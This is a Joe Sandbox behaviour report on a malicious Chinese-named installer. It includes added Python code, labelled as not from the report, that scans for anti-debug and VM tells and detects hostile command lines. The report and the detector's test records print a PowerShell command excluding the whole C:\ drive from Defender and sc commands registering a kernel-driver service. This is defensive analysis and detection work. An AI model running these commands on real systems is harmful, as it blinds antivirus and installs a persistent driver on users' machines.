Source: C:\Program Files (x86)\Windows NT\7zr.exe; Code function: 10_2_00CA9C60 GetSystemInfo, 10_2_00CA9C60
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Thread delayed: delay time: 922337203685477
Source: #U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmp, 00000001.00000002.1772033618.0000000001408000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: #U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmp, 00000001.00000002.1772033618.0000000001408000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}X
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process information queried: ProcessInformation

Anti Debugging

Source: C:\Users\user\AppData\Local\Temp\is-CUPF8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmp; Code function: 6_2_6BF73886 NtSetInformationThread 00000000,00000011,00000000,00000000 6_2_6BF73886
Source: C:\Users\user\AppData\Local\Temp\is-CUPF8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmp; Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\is-CUPF8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmp; Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\is-CUPF8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmp; Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\is-CUPF8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmp; Code function: 6_2_6C103871 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 6_2_6C103871
Source: C:\Program Files (x86)\Windows NT\7zr.exe; Code function: 10_2_00D257D0 GetCurrentProcessId,GetCurrentThreadId,LoadLibraryW,GetProcAddress,FreeLibrary,GetTickCount,QueryPerformanceCounter,GetTickCount, 10_2_00D257D0
Source: C:\Users\user\AppData\Local\Temp\is-CUPF8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmp; Code function: 6_2_6C10D425 mov eax, dword ptr fs:[00000030h] 6_2_6C10D425
Source: C:\Users\user\AppData\Local\Temp\is-CUPF8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmp; Code function: 6_2_6C10D456 mov eax, dword ptr fs:[00000030h] 6_2_6C10D456
Source: C:\Users\user\AppData\Local\Temp\is-CUPF8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmp; Code function: 6_2_6C10286D mov eax, dword ptr fs:[00000030h] 6_2_6C10286D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\is-CUPF8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmp; Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\is-CUPF8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmp; Code function: 6_2_6C103871 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 6_2_6C103871
Source: C:\Users\user\AppData\Local\Temp\is-CUPF8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmp; Code function: 6_2_6C0FC3AD SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 6_2_6C0FC3AD
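Added example, not part of the Joe Sandbox report and not code from the sample: a Python static triage pass that looks for the same tells the Malware Analysis System Evasion and Anti Debugging sections above record dynamically, so a responder can check a dropped file such as the .tmp's module or tProtect.dll before detonating it. It searches a byte blob for the "mov eax, fs:[30h]" PEB reads reported at 6_2_6C10D425, 6_2_6C10D456 and 6_2_6C10286D (PEB.BeingDebugged is the byte at offset 2, so this is the inline form of IsDebuggerPresent), for the names of the APIs behind the reported behaviour (IsDebuggerPresent, NtSetInformationThread with ThreadInformationClass 0x11 = ThreadHideFromDebugger, NtQueryInformationProcess for ProcessDebugPort, GetSystemFirmwareTable / NtQuerySystemInformation for the FirmwareTableInformation query), and for hypervisor strings such as the NECVMWar / VMware SATA device path found in the .tmp's memory, in both ASCII and UTF-16LE. The buffer it scans is constructed here to contain those tells; the function names and the sample layout are assumptions. One caveat when reading the report: the powershell.exe delay of 922337203685477 ms is 2^63 divided by 10^4, the largest relative NT timeout expressed in milliseconds, which is how an open-ended wait on a handle appears rather than a chosen sleep interval, so the repeated sub-second threadDelayed loops in the .tmp are the better candidates for sleep-based evasion.

```python
"""Static triage for the anti-debug / anti-VM tells listed above (added example)."""
import re

# x86 encodings of "mov r32, fs:[0x30]": a read of the PEB pointer from the
# TEB. BeingDebugged is the byte at PEB+2, so this is the inline form of
# IsDebuggerPresent (the report shows three such reads in the .tmp's module).
PEB_READ_PATTERNS = {
    "mov eax, fs:[30h]": bytes.fromhex("64A130000000"),
    "mov ecx, fs:[30h]": bytes.fromhex("648B0D30000000"),
    "mov edx, fs:[30h]": bytes.fromhex("648B1530000000"),
    "mov ebx, fs:[30h]": bytes.fromhex("648B1D30000000"),
}

# API names behind the reported behaviour, matched as ASCII (import names or
# strings handed to GetProcAddress).
ANTI_DEBUG_APIS = [b"IsDebuggerPresent", b"CheckRemoteDebuggerPresent",
                   b"NtSetInformationThread", b"NtQueryInformationProcess"]
FIRMWARE_APIS = [b"GetSystemFirmwareTable", b"EnumSystemFirmwareTables",
                 b"NtQuerySystemInformation"]

# Hypervisor artefacts; matched as ASCII and as UTF-16LE, case-insensitively.
VM_STRINGS = [b"VMware", b"NECVMWar", b"VBOX", b"VirtualBox", b"QEMU"]


def find_all(blob, needle, ignore_case=False):
    """Every offset of needle in blob."""
    flags = re.IGNORECASE if ignore_case else 0
    return [m.start() for m in re.finditer(re.escape(needle), blob, flags)]


def scan(blob):
    """Map indicator name -> sorted offsets for every indicator present in blob."""
    found = {}
    for name, pattern in PEB_READ_PATTERNS.items():
        if offs := find_all(blob, pattern):
            found[name] = offs
    for api in ANTI_DEBUG_APIS + FIRMWARE_APIS:
        if offs := find_all(blob, api):
            found[api.decode()] = offs
    for s in VM_STRINGS:
        offs = find_all(blob, s, True) + find_all(blob, s.decode().encode("utf-16-le"), True)
        if offs:
            found["vm-string:" + s.decode()] = sorted(offs)
    return found


def triage(blob):
    """Summarise scan() into the four categories the report's signatures use."""
    found = scan(blob)
    return {
        "peb_read": any(k.startswith("mov ") for k in found),
        "anti_debug_api": any(k.encode() in ANTI_DEBUG_APIS for k in found),
        "firmware_query": any(k.encode() in FIRMWARE_APIS for k in found),
        "vm_strings": any(k.startswith("vm-string:") for k in found),
        "findings": found,
    }


# Constructed sample (not bytes from the real .tmp): NOP filler around the tells.
SAMPLE = (
    b"\x90" * 16
    + bytes.fromhex("64A130000000")        # mov eax, fs:[30h]
    + bytes.fromhex("8A4002")              # mov al, [eax+2]  -> PEB.BeingDebugged
    + b"\x90" * 8 + b"NtSetInformationThread\x00"
    + b"\x90" * 8 + b"IsDebuggerPresent\x00"
    + b"\x90" * 8 + b"GetSystemFirmwareTable\x00"
    + "\\??\\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00".encode("utf-16-le")
    + b"\x90" * 16
)

if __name__ == "__main__":
    for key, val in triage(SAMPLE).items():
        print(f"{key}: {val}")
```

Run it against `open(path, "rb").read()` of a dropped file instead of SAMPLE; a packed or encrypted payload (the report flags Software Packing and Obfuscated Files) will hide the API names until unpacked, while the fs:[30h] encodings and the UTF-16LE device strings survive in the unpacked module, which is why the scan keys on both.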

HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\AppData\Local\Temp\is-96EUT.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmp; Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'" (2 occurrences)
Source: tProtect.dll.12.dr; Static PE information: Found potential injection code
Source: C:\Users\user\AppData\Local\Temp\is-96EUT.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmp; Process created: C:\Users\user\Desktop\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.exe "C:\Users\user\Desktop\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.exe" /VERYSILENT
Source: C:\Users\user\AppData\Local\Temp\is-CUPF8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmp; Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe; Process created: C:\Windows\System32\sc.exe sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto
Source: C:\Windows\System32\cmd.exe; Process created: C:\Windows\System32\sc.exe sc start CleverSoar (31 occurrences)
Source: C:\Windows\System32\cmd.exe; Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\is-CUPF8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmp; Code function: 6_2_6C1CA700 cpuid 6_2_6C1CA700
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation (2 occurrences)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation (3 occurrences)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation (3 occurrences)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Program Files (x86)\Windows NT\7zr.exe; Code function: 10_2_00CAAB2A GetSystemTimeAsFileTime, 10_2_00CAAB2A
Source: C:\Program Files (x86)\Windows NT\7zr.exe; Code function: 10_2_00D40090 GetVersion, 10_2_00D40090
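Added example, not from the report or the sample: detection logic in Python, run over constructed process-creation records in the shape of Sysmon Event ID 1 / Security 4688 fields, for the three command lines in the HIPS / PFW / Operating System Protection Evasion section above: the Defender exclusion of the whole C:\ drive (including the -EncodedCommand form that the "Powershell Base64 Encoded MpPreference Cmdlet" Sigma rule from the signature list targets, which the script decodes before matching), the sc create of a type= kernel service whose binPath is a .dll under Program Files (x86) instead of a .sys under System32\drivers, and sc start of that service. The record fields, the two benign control rows and the severity labels are assumptions. On a live host the same facts also land in System event 7045 (service installed) and Microsoft-Windows-Windows Defender/Operational event 5007 (configuration change), which are the places to confirm a hit.

```python
"""Detection logic for the Defender-exclusion and kernel-service command lines (added example)."""
import base64
import re

DRIVE_ROOT = re.compile(r"^[A-Za-z]:\\?$")           # e.g. C:\  (whole volume excluded)
IOC_SERVICE_NAMES = {"cleversoar"}                    # service name from this report
SC_KV = re.compile(r'(\w+)=\s*("[^"]*"|\S+)')         # sc's "key= value" argument syntax
ENC_ARG = re.compile(r"-(?:EncodedCommand|enc|ec|e)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)


def decode_encoded_command(cmdline):
    """Return the script behind -EncodedCommand (base64 of UTF-16LE), else cmdline unchanged."""
    m = ENC_ARG.search(cmdline)
    if not m:
        return cmdline
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return cmdline


def exclusion_paths(script):
    """-ExclusionPath values from an Add-/Set-MpPreference call, quotes stripped."""
    if not re.search(r"\b(?:Add|Set)-MpPreference\b", script, re.IGNORECASE):
        return []
    m = re.search(r"-ExclusionPath\s+([^\s;|,]+(?:\s*,\s*[^\s;|,]+)*)", script, re.IGNORECASE)
    return [p.strip(" '\"") for p in m.group(1).split(",")] if m else []


def parse_sc_create(cmdline):
    """'sc create <name> key= value ...' -> {'name': ..., 'binpath': ..., 'type': ...}."""
    m = re.search(r"\bcreate\s+(\S+)", cmdline, re.IGNORECASE)
    if not m:
        return None
    svc = {"name": m.group(1)}
    for key, val in SC_KV.findall(cmdline[m.end():]):
        svc[key.lower()] = val.strip('"')
    return svc


def driver_findings(svc):
    """Flags for a parsed sc create: known-bad name, kernel type with an odd image path."""
    out = []
    if svc["name"].lower() in IOC_SERVICE_NAMES:
        out.append(("high", f"service name matches report IOC: {svc['name']}"))
    if svc.get("type", "").lower() == "kernel":
        path = svc.get("binpath", "")
        if not path.lower().endswith(".sys"):
            out.append(("high", f"kernel driver {svc['name']} registered with non-.sys image: {path}"))
        if not re.search(r"\\system32\\drivers\\", path, re.IGNORECASE):
            out.append(("high", f"kernel driver {svc['name']} loaded from outside System32\\drivers: {path}"))
    return out


def evaluate(event):
    """(severity, reason) findings for one process-creation record."""
    image, cmd = event["Image"].lower(), event["CommandLine"]
    findings = []
    if image.endswith(("powershell.exe", "pwsh.exe")):
        script = decode_encoded_command(cmd)
        if script != cmd:
            findings.append(("low", "encoded PowerShell command decoded"))
        for p in exclusion_paths(script):
            findings.append(("high" if DRIVE_ROOT.match(p) else "medium", f"Defender exclusion added: {p}"))
    elif image.endswith("sc.exe"):
        svc = parse_sc_create(cmd)
        if svc:
            findings += driver_findings(svc)
        m = re.search(r"\bstart\s+(\S+)", cmd, re.IGNORECASE)
        if m and m.group(1).lower() in IOC_SERVICE_NAMES:
            findings.append(("high", f"start of known-bad service {m.group(1)}"))
    return findings


# Constructed records in Sysmon EID 1 / Security 4688 field shape. Rows 0, 2, 3
# mirror the report; row 1 is the encoded variant; rows 4 and 5 are benign controls.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
TMP = r"C:\Users\user\AppData\Local\Temp\is-96EUT.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmp"
ENCODED = base64.b64encode("Add-MpPreference -ExclusionPath 'C:\\'".encode("utf-16-le")).decode()
EVENTS = [
    {"ParentImage": TMP, "Image": PS,
     "CommandLine": r'''"powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'"'''},
    {"ParentImage": TMP, "Image": PS, "CommandLine": f"powershell.exe -EncodedCommand {ENCODED}"},
    {"ParentImage": r"C:\Windows\System32\cmd.exe", "Image": r"C:\Windows\System32\sc.exe",
     "CommandLine": r'sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto'},
    {"ParentImage": r"C:\Windows\System32\cmd.exe", "Image": r"C:\Windows\System32\sc.exe",
     "CommandLine": "sc start CleverSoar"},
    {"ParentImage": r"C:\Windows\System32\cmd.exe", "Image": r"C:\Windows\System32\sc.exe",
     "CommandLine": r'sc create mydrv binPath= "C:\Windows\System32\drivers\mydrv.sys" type= kernel start= demand'},
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": PS, "CommandLine": 'powershell.exe -Command "Get-MpPreference"'},
]

if __name__ == "__main__":
    for i, ev in enumerate(EVENTS):
        for sev, why in evaluate(ev):
            print(f"[{sev}] event {i}: {why}")
```

The kernel-service rule deliberately does not key on the name alone: a driver registered from a user-writable directory with a .dll extension is the durable signal, and the Defender exclusion of a drive root is what makes the later drops (hrsw.vbc, update.vbc, tProtect.dll) invisible to the scanner, so the two findings together describe the chain the report shows.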
MITRE ATT&CK matrix (one line per tactic, read down the report's columns; a leading number is the report's signature-count badge for that technique, techniques without one are the matrix's unmatched placeholder cells):

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application
Execution: 2 Command and Scripting Interpreter; 1 Service Execution; 1 Native API; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter
Persistence: 1 Windows Service; 1 DLL Side-Loading; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At
Privilege Escalation: 1 Access Token Manipulation; 1 Windows Service; 111 Process Injection; 1 DLL Side-Loading; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At
Defense Evasion: 11 Masquerading; 1 Disable or Modify Tools; 231 Virtualization/Sandbox Evasion; 1 Access Token Manipulation; 111 Process Injection; 1 Deobfuscate/Decode Files or Information; 3 Obfuscated Files or Information; 1 Software Packing; 1 DLL Side-Loading
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow
Discovery: 1 System Time Discovery; 421 Security Software Discovery; 231 Virtualization/Sandbox Evasion; 2 Process Discovery; 1 Application Window Discovery; 2 System Owner/User Discovery; 3 File and Directory Discovery; 25 System Information Discovery; Network Sniffing
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections
Collection: 1 Archive Collected Data; Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged
Command and Control: 1 Encrypted Channel; Junk Data; Steganography; Protocol Impersonation; Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol
Impact: 1 System Shutdown/Reboot; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement
Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
Behavior Graph ID: 1580542 | Sample: #U5b89#U88c5#U7a0b#U5e8f_1.... | Startdate: 25/12/2024 | Architecture: WINDOWS | Score: 96
Signatures on the start node: Multi AV Scanner detection for dropped file; Multi AV Scanner detection for submitted file; Found driver which could be used to inject code into processes; 3 other signatures
Process tree (numbers after a process name are the graph's count badges, see legend):
  • #U5b89#U88c5#U7a0b#U5e8f_1.1.4.exe 2
    • dropped: C:\...\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmp, PE32
    • #U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmp 3 5
      • dropped: C:\Users\user\AppData\Local\...\update.vbc, PE32; C:\Users\user\AppData\Local\...\_setup64.tmp, PE32+
      • signature: Adds a directory exclusion to Windows Defender
      • #U5b89#U88c5#U7a0b#U5e8f_1.1.4.exe 2
        • dropped: C:\...\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmp, PE32
        • #U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmp 4 15
          • dropped: C:\Users\user\AppData\Local\...\update.vbc, PE32; C:\Program Files (x86)\Windows NT\hrsw.vbc, PE32; C:\Users\user\AppData\Local\...\_setup64.tmp, PE32+; C:\Program Files (x86)\Windows NT\7zr.exe, PE32
          • signatures: Query firmware table information (likely to detect VMs); Protects its processes via BreakOnTermination flag; Hides threads from debuggers; Contains functionality to hide a thread from the debugger
          • 7zr.exe 2
            • dropped: C:\Program Files (x86)\...\tProtect.dll, PE32+
            • conhost.exe
          • 7zr.exe 7
            • conhost.exe
      • powershell.exe 23
        • signature: Loading BitLocker PowerShell Module
        • conhost.exe
        • WmiPrvSE.exe
  • cmd.exe
    • sc.exe 1
      • conhost.exe
  • cmd.exe
    • sc.exe 1
      • conhost.exe
  • 31 other processes
    • sc.exe 1 (three instances), each with a conhost.exe child
    • 27 other processes
      • conhost.exe
      • 26 other processes

Submitted file:
Source | Detection | Scanner | Label
#U5b89#U88c5#U7a0b#U5e8f_1.1.4.exe | 5% | ReversingLabs | Win32.Trojan.Generic
#U5b89#U88c5#U7a0b#U5e8f_1.1.4.exe | 8% | Virustotal |

Dropped files:
Source | Detection | Scanner | Label
C:\Program Files (x86)\Windows NT\7zr.exe | 0% | ReversingLabs |
C:\Program Files (x86)\Windows NT\7zr.exe | 0% | Virustotal |
C:\Program Files (x86)\Windows NT\hrsw.vbc | 26% | ReversingLabs |
C:\Program Files (x86)\Windows NT\hrsw.vbc | 38% | Virustotal |
C:\Program Files (x86)\Windows NT\tProtect.dll | 9% | ReversingLabs |
C:\Program Files (x86)\Windows NT\tProtect.dll | 6% | Virustotal |
C:\Users\user\AppData\Local\Temp\is-96EUT.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmp | 1% | Virustotal |
C:\Users\user\AppData\Local\Temp\is-BULE6.tmp\_isetup\_setup64.tmp | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\is-BULE6.tmp\update.vbc | 26% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\is-NFHOR.tmp\_isetup\_setup64.tmp | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\is-NFHOR.tmp\update.vbc | 26% | ReversingLabs |
No Antivirus matches
No Antivirus matches
No Antivirus matches
No contacted domains info
Name | Source | Malicious | Antivirus Detection | Reputation
https://jrsoftware.org/ishelp/index.php?topic=setupcmdline | SetupU#U5b89#U88c5#U7a0b#U5e8f_1.1.4.exe | false | | high
https://www.remobjects.com/ps | #U5b89#U88c5#U7a0b#U5e8f_1.1.4.exe, 00000000.00000003.1676606291.000000007EEDB000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U7a0b#U5e8f_1.1.4.exe, 00000000.00000003.1675936852.0000000002BA0000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmp, 00000001.00000000.1678022236.0000000000221000.00000020.00000001.01000000.00000004.sdmp, #U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmp, 00000006.00000000.1767147398.00000000006ED000.00000020.00000001.01000000.00000008.sdmp, #U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmp.0.dr, #U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmp.5.dr | false | | high
https://www.innosetup.com/ | #U5b89#U88c5#U7a0b#U5e8f_1.1.4.exe, 00000000.00000003.1676606291.000000007EEDB000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U7a0b#U5e8f_1.1.4.exe, 00000000.00000003.1675936852.0000000002BA0000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmp, 00000001.00000000.1678022236.0000000000221000.00000020.00000001.01000000.00000004.sdmp, #U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmp, 00000006.00000000.1767147398.00000000006ED000.00000020.00000001.01000000.00000008.sdmp, #U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmp.0.dr, #U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmp.5.dr | false | | high
        No contacted IP infos
        Joe Sandbox version:41.0.0 Charoite
        Analysis ID:1580542
        Start date and time:2024-12-25 03:41:35 +01:00
        Joe Sandbox product:CloudBasic
        Overall analysis duration:0h 9m 46s
        Hypervisor based Inspection enabled:false
        Report type:full
        Cookbook file name:default.jbs
        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
        Run name:Run with higher sleep bypass
        Number of new started processes analysed:110
        Number of new started drivers analysed:0
        Number of existing processes analysed:0
        Number of existing drivers analysed:0
        Number of injected processes analysed:0
        Technologies:
        • HCA enabled
        • EGA enabled
        • AMSI enabled
        Analysis Mode:default
        Analysis stop reason:Critical Process Termination
        Sample name:#U5b89#U88c5#U7a0b#U5e8f_1.1.4.exe
        renamed because original name is a hash value
        Original Sample Name:_1.1.4.exe
        Detection:MAL
        Classification:mal96.evad.winEXE@146/31@0/0
        EGA Information:
        • Successful, ratio: 100%
        HCA Information:
        • Successful, ratio: 74%
        • Number of executed functions: 121
        • Number of non-executed functions: 102
        Cookbook Comments:
        • Found application associated with file extension: .exe
        • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
        • Sleep loops longer than 100000000ms are bypassed. Single calls with delay of 100000000ms and higher are ignored
        • Exclude process from analysis (whitelisted): Conhost.exe, SIHClient.exe
        • Excluded IPs from analysis (whitelisted): 4.245.163.56
        • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, dns.msftncsi.com, fe3cr.delivery.mp.microsoft.com
        • Not all processes were analyzed, report is missing behavior information
        • Report size exceeded maximum capacity and may have missing behavior information.
        • Report size exceeded maximum capacity and may have missing disassembly code.
        • Report size getting too big, too many NtCreateKey calls found.
        • Report size getting too big, too many NtOpenKeyEx calls found.
        • Report size getting too big, too many NtQueryValueKey calls found.
        No simulations
        No context
        No context
        No context
        No context
Match: C:\Program Files (x86)\Windows NT\7zr.exe
Associated Sample Name / URL | Detection | Threat Name
#U5b89#U88c5#U52a9#U624b2.0.6.exe | malicious | Unknown
#U5b89#U88c5#U52a9#U624b2.0.7.exe | malicious | Unknown
#U5b89#U88c5#U52a9#U624b2.0.5.exe | malicious | Unknown
#U5b89#U88c5#U52a9#U624b2.0.4.exe | malicious | Unknown
#U5b89#U88c5#U52a9#U624b2.0.2.exe | malicious | Unknown
#U5b89#U88c5#U52a9#U624b2.0.3.exe | malicious | Unknown
#U5b89#U88c5#U52a9#U624b2.0.1.exe | malicious | Unknown
#U5b89#U88c5#U52a9#U624b2.0.6.exe | malicious | Unknown
#U5b89#U88c5#U52a9#U624b2.0.7.exe | malicious | Unknown
                          Process:C:\Users\user\AppData\Local\Temp\is-CUPF8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmp
                          File Type:PE32 executable (console) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):831200
                          Entropy (8bit):6.671005303304742
                          Encrypted:false
                          SSDEEP:24576:A48I9t/zu2QSM0TMzOCkY+we/86W5gXKxZ5:Ae71MzuiehWIKxZ
                          MD5:84DC4B92D860E8AEA55D12B1E87EA108
                          SHA1:56074A031A81A2394770D4DA98AC01D99EC77AAD
                          SHA-256:BA1EC2C30212F535231EBEB2D122BDA5DD0529D80769495CCFD74361803E3880
                          SHA-512:CF3552AD1F794582F406FB5A396477A2AA10FCF0210B2F06C3FC4E751DB02193FB9AA792CD994FA398462737E9F9FFA4F19F095A82FC48F860945E98F1B776B7
                          Malicious:false
                          Antivirus:
